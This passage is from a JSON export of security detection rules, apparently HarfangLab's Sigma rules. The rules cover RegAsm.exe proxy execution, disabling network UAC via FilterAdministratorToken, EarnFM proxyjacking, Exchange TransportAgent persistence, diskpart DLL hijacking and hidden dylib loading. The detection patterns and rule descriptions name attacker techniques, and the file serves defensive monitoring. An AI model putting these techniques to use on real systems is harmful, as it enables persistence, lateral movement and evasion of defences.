*\\ceniber\\autonet\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\diamic\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cashdrawer.dll /tlb:cls_cashdrawer.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cfd.dll /tlb:cls_cfd.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_depileuraures.dll /tlb:cls_depileuraures.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_print.dll /tlb:cls_print.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /silent *\\dedalus\\meds\\soins\\v7\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /tlb fiducial.rao.wordaddin.interop.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\batigestconnect\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\sage-paie\\declarations sociales\\client\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\b1crufl.dll /register /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\sagelcp.dll /s /nolog /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\fiducial.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\lexisnexis.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coloris\\activex\\interfacecoffrefort\\cosolucecoffrefortclient.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ecs2000.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\paie\\sagepaie\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo *\\salarior\\bus_bl\\pes\\bl.sante.interop.iparapheur.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcsmmclib.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcstraceconsole.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent ?:\\windows\\syswow64\\annoterpdf2.dll tlb ?:\\windows\\syswow64\\annoterpdf2.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent impac.mosaiq.charting.documents.mergefields.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe stange.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\\\regasm.exe stinterfaces.dll /codebase /tlb:?:\\program files (x86)\\philips\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\pacom.gms.extendedconfiguration.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.drive.drivetextserver.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.utilities.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /u *\\kansysedge\\rmp\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm fiducial.transim.comstarter.dll /codebase /tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm jdsu.fit.fiberchek.automation.dll /codebase'\n - '?:\\WINDOWS\\Microsoft.NET\\Framework*\\\\*\\regasm.exe /silent /codebase ?:\\ProgramData\\SOLIDWORKS\\\\*'\n\n exclusion_legitimate_grandparent:\n ProcessGrandparentCommandLine:\n # Ignore shares as they may often host legitimate installers\n - '\\\\\\\\*\\\\*'\n # SCCM\n - '?:\\Windows\\ccmcache\\\\*'\n # Legitimate apps\n - '?:\\Becpwin\\\\*'\n - '*\\Cosoluce\\bigjim\\Supernova.Client.BigJim.Service.exe'\n - '?:\\Windows\\Temp\\MW-????????-????-????-????-????????????\\setup_QBloc_*.exe'\n - '?:\\ProgramData\\Edisys\\SPIGAO\\iulm\\SPIGAOConnect_Setup-PROD.exe'\n\n exclusion_innosetuptools:\n CommandLine:\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n\n exclusion_lenovo:\n CommandLine:\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\\\*\\PluginsContract.dll'\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\Vantage\\Addins\\LenovoBatteryGaugeAddin\\\\*\\PluginsContract.dll'\n\n exclusion_archimed_docmaker:\n ParentImage|endswith: '\\ArchimedDocMakerRegister.exe'\n CommandLine|contains: 'Achimed.DocMaker*.dll'\n\n exclusion_solu_qiq:\n ParentImage|endswith: '\\SOLU-QIQ Base *.*.*.exe'\n CommandLine|contains:\n - 'Convertisseur.dll'\n - 'ADAuthentication.dll'\n\n exclusion_wrapper_webview:\n ParentImage|endswith: 'WrapperWebView2.exe'\n ParentCommandLine|contains: '/ACTION=INSTALL'\n CommandLine|contains:\n - 'Microsoft.Web.WebView2.WinForms.tlb'\n - 'Microsoft.Web.WebView2.Core.tlb'\n\n exclusion_bat_emc:\n ParentImage|endswith: 'Setup_BAT-EMC_*.*.*.*.exe'\n CommandLine|contains:\n - 'VisuMonitoring.dll'\n - 'BatEmcBridge.dll'\n - 'SpectrogramActiveX.dll'\n\n exclusion_ivanti:\n ParentImage|endswith: '\\Ivanti20??-*\\Setup.exe'\n CommandLine|contains: 'Interop.ComUtilitiesLib.dll'\n\n exclusion_inot_office:\n ParentImage|endswith:\n - '\\GenApi.iNot.RegisterCOMComponants.exe'\n - '\\GenApi.CTI.Launcher.exe'\n CommandLine|contains:\n - '\\GenApi.iNot.Client.FramePlayer.DLL'\n - '\\GenApi.CTI.Data.iNot.dll'\n\n exclusion_fiducial:\n GrandparentImage|endswith:\n - '\\majfuposte.exe'\n - 'fncgf_evaluationprivilege.exe'\n ParentCommandLine|contains: '\\AppData\\Roaming\\fiducial\\compta\\'\n\n exclusion_water_ics:\n GrandparentImage|endswith: 'Waters\\ICS\\Companion\\ICSCompanionSvc.exe'\n ParentImage|endswith: 'Waters\\ICS\\Companion\\SetupHelper.exe'\n CommandLine|endswith: 'Waters.*.*.dll'\n\n exclusion_dolby:\n GrandparentImage|endswith: '\\DAX3API.EXE'\n ParentCommandLine|endswith: '\\DAX3APIDLL.dll'\n\n exclusion_mosaiq:\n GrandparentImage|endswith: '\\SetupMosaiq.tmp'\n ParentImage|endswith: '\\RegisterAssemblies.exe'\n\n exclusion_sage1:\n - GrandparentImage|endswith:\n - '\\Sagedirect.exe'\n - '\\SageDS_*_*_*.exe'\n - ParentCommandLine|contains:\n - '\\SageDS\\Client\\InstallShieldEnregistrementCOM.bat'\n - 'Sagedirect*.exe'\n exclusion_sage2:\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'SAGE SAS'\n\n exclusion_common_dlls:\n CommandLine|contains:\n - 'GenApi.iNot.*.*.dll'\n - 'GdPicture.NET.*.dll'\n\n exclusion_sap_se:\n ParentImage|endswith: '\\NwSapSetup.exe'\n CommandLine|contains:\n - 'sapnco.dll'\n - 'rscp4n.dll'\n\n exclusion_atempo:\n ParentImage: '?:\\Program Files\\Atempo\\TimeNavigator\\\\*\\Bin\\tina_*.exe'\n\n exclusion_philips:\n ParentImage:\n - '?:\\Program Files\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n - '?:\\Program Files (x86)\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n\n exclusion_sap:\n ParentImage|endswith: '\\setup\\NwSapSetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'SAP SE'\n\n exclusion_configuration_manager:\n ParentImage|endswith:\n - '\\srvboot.exe'\n - '\\cmupdate.exe'\n - '\\rolesetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_kansysedge:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\kansysedge\\installscripts\\utilities\\reregisterassemblies.bat'\n\n exclusion_genapi:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\genapi\\gupta\\i-not\\regasm_dlls.cmd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4", "rule_name": "Suspicious Proxy Execution via regasm.exe", "rule_description": "Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\nThis may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\nAWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\nApplication whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\nThis can also be used by program installers in Windows.\nIt is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\n", "rule_creation_date": "2023-01-04", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218.009" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "03983a13-d23e-4494-b3c5-9b24bf51acfc", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.622015Z", "creation_date": "2026-03-23T11:45:34.622017Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.622021Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", "https://attack.mitre.org/techniques/T1112/" ], "name": "t1112_disable_filteradministratortoken.yml", "content": "title: Network UAC Restrictions Disabled for Local Administrator\nid: 03983a13-d23e-4494-b3c5-9b24bf51acfc\ndescription: |\n Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\n By default this value is not set but adversaries may try to change it to circumvent a hardening policy.\n This will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\n It is recommended to investigate any suspicious authentication using the local administrator account.\nreferences:\n - https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.lateral_movement\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\FilterAdministratorToken'\n Details|contains: '?WORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_local_security_policy:\n ProcessImage|endswith: '\\services.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_winoobe:\n ProcessGrandparentImage: '?:\\Windows\\System32\\setupugc.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_logmein:\n ProcessImage: '?:\\Program Files (x86)\\LogMeIn\\x64\\LogMeIn.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "03983a13-d23e-4494-b3c5-9b24bf51acfc", "rule_name": "Network UAC Restrictions Disabled for Local Administrator", "rule_description": "Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\nBy default this value is not set but adversaries may try to change it to circumvent a hardening policy.\nThis will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\nIt is recommended to investigate any suspicious authentication using the local administrator account.\n", "rule_creation_date": "2023-12-27", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1112" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.613613Z", "creation_date": "2026-03-23T11:45:34.613616Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.613624Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking", "https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html", "https://attack.mitre.org/techniques/T1496/" ], "name": "t1496_earnfm.yml", "content": "title: EarnFM Executed\nid: 039f1d5b-74b0-46d1-8a0e-dfa8bea707bd\ndescription: |\n Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.EarnFm\n - classification.Linux.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' EARNFM_TOKEN='\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd", "rule_name": "EarnFM Executed", "rule_description": "Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n", "rule_creation_date": "2024-09-26", "rule_modified_date": "2025-02-12", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.impact" ], "rule_technique_tags": [ "attack.t1496" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "03a594fd-50c7-4041-9c5c-706a4009f30a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.072500Z", "creation_date": "2026-03-23T11:45:34.072502Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.072506Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook", "https://attack.mitre.org/techniques/T1505/002/" ], "name": "t1505_002_new_exchange_transport_agent_powershell.yml", "content": "title: New Exchange TransportAgent Installed via PowerShell\nid: 03a594fd-50c7-4041-9c5c-706a4009f30a\ndescription: |\n Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1104\n - attack.t1071.003\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_cmdlet:\n PowershellCommand|contains: 'Install-TransportAgent '\n\n selection_assemblypath:\n PowershellCommand|contains:\n - ' -A ' # -AssemblyPath\n - ' -As ' # -AssemblyPath\n - ' -Ass ' # -AssemblyPath\n - ' -Asse ' # -AssemblyPath\n - ' -Assem ' # -AssemblyPath\n - ' -Assemb ' # -AssemblyPath\n - ' -Assembl ' # -AssemblyPath\n - ' -Assembly ' # -AssemblyPath\n - ' -AssemblyP ' # -AssemblyPath\n - ' -AssemblyPa ' # -AssemblyPath\n - ' -AssemblyPat ' # -AssemblyPath\n - ' -AssemblyPath ' # -AssemblyPath\n\n selection_transportagent:\n PowershellCommand|contains:\n - ' -T ' # -TransportAgentFactory\n - ' -Tr ' # -TransportAgentFactory\n - ' -Tra ' # -TransportAgentFactory\n - ' -Tran ' # -TransportAgentFactory\n - ' -Trans ' # -TransportAgentFactory\n - ' -Transp ' # -TransportAgentFactory\n - ' -Transpo ' # -TransportAgentFactory\n - ' -Transpor ' # -TransportAgentFactory\n - ' -Transport ' # -TransportAgentFactory\n - ' -TransportA ' # -TransportAgentFactory\n - ' -TransportAg ' # -TransportAgentFactory\n - ' -TransportAge ' # -TransportAgentFactory\n - ' -TransportAgen ' # -TransportAgentFactory\n - ' -TransportAgent ' # -TransportAgentFactory\n - ' -TransportAgentF ' # -TransportAgentFactory\n - ' -TransportAgentFa ' # -TransportAgentFactory\n - ' -TransportAgentFac ' # -TransportAgentFactory\n - ' -TransportAgentFact ' # -TransportAgentFactory\n - ' -TransportAgentFacto ' # -TransportAgentFactory\n - ' -TransportAgentFactor ' # -TransportAgentFactory\n - ' -TransportAgentFactory ' # -TransportAgentFactory\n\n exclusion_fsecure:\n PowershellCommand|contains: 'Install-TransportAgent -Name $AGENT -AssemblyPath $AGINSTDIR\\fstragnt.dll'\n\n exclusion_kaspersky:\n PowershellCommand|contains|all:\n - 'Kaspersky Security '\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Microsoft Exchange Servers\\Kse.ExchangeIntegration.Transport.dll'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Smex\\instSetupHelper.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "03a594fd-50c7-4041-9c5c-706a4009f30a", "rule_name": "New Exchange TransportAgent Installed via PowerShell", "rule_description": "Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\n", "rule_creation_date": "2022-11-08", "rule_modified_date": "2025-05-26", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.collection", "attack.command_and_control", "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1071.003", "attack.t1104", "attack.t1114.002", "attack.t1505.002", "attack.t1546.008" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "03d8eca6-3f1e-4d11-b989-2c6762458061", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.587248Z", "creation_date": "2026-03-23T11:45:34.587252Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.587259Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://twitter.com/an0n_r0/status/1544472352657915904", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_diskpart.yml", "content": "title: DLL Hijacking via diskpart.exe\nid: 03d8eca6-3f1e-4d11-b989-2c6762458061\ndescription: |\n Detects potential Windows DLL Hijacking via diskpart.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'diskpart.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "03d8eca6-3f1e-4d11-b989-2c6762458061", "rule_name": "DLL Hijacking via diskpart.exe", "rule_description": "Detects potential Windows DLL Hijacking via diskpart.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.092994Z", "creation_date": "2026-03-23T11:45:34.092996Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093000Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1564/001/" ], "name": "t1564_001_hidden_dylib_loaded.yml", "content": "title: Hidden Dylib File Loaded\nid: 03dfe441-3d70-41a1-8a9b-9e3c68cee99b\ndescription: |\n Detects a hidden dylib library being loaded.\n Adversaries can create hidden malicious libraries to avoid raising users' suspicions.\n It is recommended to check the origin of the library to determine its legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/06/03\nmodified: 2025/11/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.LibraryLoaded\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|re: '.*\\/\\.[^\\/]*$'\n\n exclusion_grr:\n ImageLoaded:\n - '/private/var/db/oah/*/*/.Python.aot'\n - '/usr/local/lib/grr/grr_*/.Python'\n Image: '/usr/local/lib/grr/grr_*/grr'\n\n exclusion_postman:\n Image: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_var_folder:\n ImageLoaded|startswith:\n - '/private/var/folders/??/'\n - 